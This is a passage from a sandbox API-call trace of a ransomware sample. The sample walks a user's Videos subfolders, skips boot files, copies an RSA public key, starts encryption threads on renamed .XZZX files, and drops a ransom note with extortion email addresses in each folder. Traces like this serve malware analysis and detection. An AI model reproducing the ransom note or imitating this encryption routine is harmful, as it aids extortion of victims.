lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0256.345] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0256.345] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0256.345] SetErrorMode (uMode=0x1) returned 0x1 [0256.345] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT") returned 70 [0256.345] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0256.345] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0256.345] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1474) returned 0x0 [0256.345] RegQueryValueExW (in: hKey=0x1474, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43df1a0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43df1a0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0256.345] RegCloseKey (hKey=0x1474) returned 0x0 [0256.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0256.345] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0256.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1474 [0256.346] CloseHandle (hObject=0x1474) returned 1 [0256.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0256.346] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0256.346] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0256.346] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0256.346] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0256.346] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0256.346] SetErrorMode (uMode=0x1) returned 0x1 [0256.346] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0256.346] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.346] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.346] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0256.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0256.346] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0256.346] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0256.346] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.346] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="ntldr") returned 0x0 [0256.346] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="NTLDR") returned 0x0 [0256.346] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.346] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.346] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0256.346] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0256.346] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0256.346] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.346] lstrcpyW (in: lpString1=0x17be7c, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0256.347] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x147c [0256.347] Sleep (dwMilliseconds=0x96) [0256.500] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.500] lstrcmpW (lpString1="8181DC6820279A95628FB268245D7EDD.XZZX", lpString2="..") returned 1 [0256.500] lstrcmpW (lpString1="8181DC6820279A95628FB268245D7EDD.XZZX", lpString2=".") returned 1 [0256.501] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.501] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="ntldr") returned 0x0 [0256.501] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="NTLDR") returned 0x0 [0256.501] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.501] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.501] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0256.501] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0256.501] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0256.501] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.501] lstrcpyW (in: lpString1=0x17be7c, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0256.501] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1480 [0256.501] Sleep (dwMilliseconds=0x96) [0256.656] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.656] lstrcmpW (lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpString2="..") returned 1 [0256.656] lstrcmpW (lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpString2=".") returned 1 [0256.656] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.656] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="ntldr") returned 0x0 [0256.657] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="NTLDR") returned 0x0 [0256.657] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.657] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0256.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0256.657] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0256.657] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.657] lstrcpyW (in: lpString1=0x17be7c, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0256.657] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1484 [0256.657] Sleep (dwMilliseconds=0x96) [0256.812] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.813] lstrcmpW (lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpString2="..") returned 1 [0256.813] lstrcmpW (lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpString2=".") returned 1 [0256.813] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.813] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="ntldr") returned 0x0 [0256.813] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="NTLDR") returned 0x0 [0256.813] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.813] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0256.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0256.813] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0256.813] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.813] lstrcpyW (in: lpString1=0x17be7c, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0256.813] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1488 [0256.813] Sleep (dwMilliseconds=0x96) [0256.968] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.968] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.968] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0256.968] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0256.969] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0256.969] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0256.969] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0256.969] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0256.969] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0256.969] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0256.969] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0256.969] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0256.969] SetErrorMode (uMode=0x1) returned 0x1 [0256.969] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT") returned 65 [0256.969] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0256.969] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0256.969] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x148c) returned 0x0 [0256.969] RegQueryValueExW (in: hKey=0x148c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43df3d0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43df3d0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0256.969] RegCloseKey (hKey=0x148c) returned 0x0 [0256.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0256.969] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0256.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148c [0256.970] CloseHandle (hObject=0x148c) returned 1 [0256.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0256.970] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0256.970] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0256.970] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0256.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0256.970] SetErrorMode (uMode=0x1) returned 0x1 [0256.970] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0256.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") 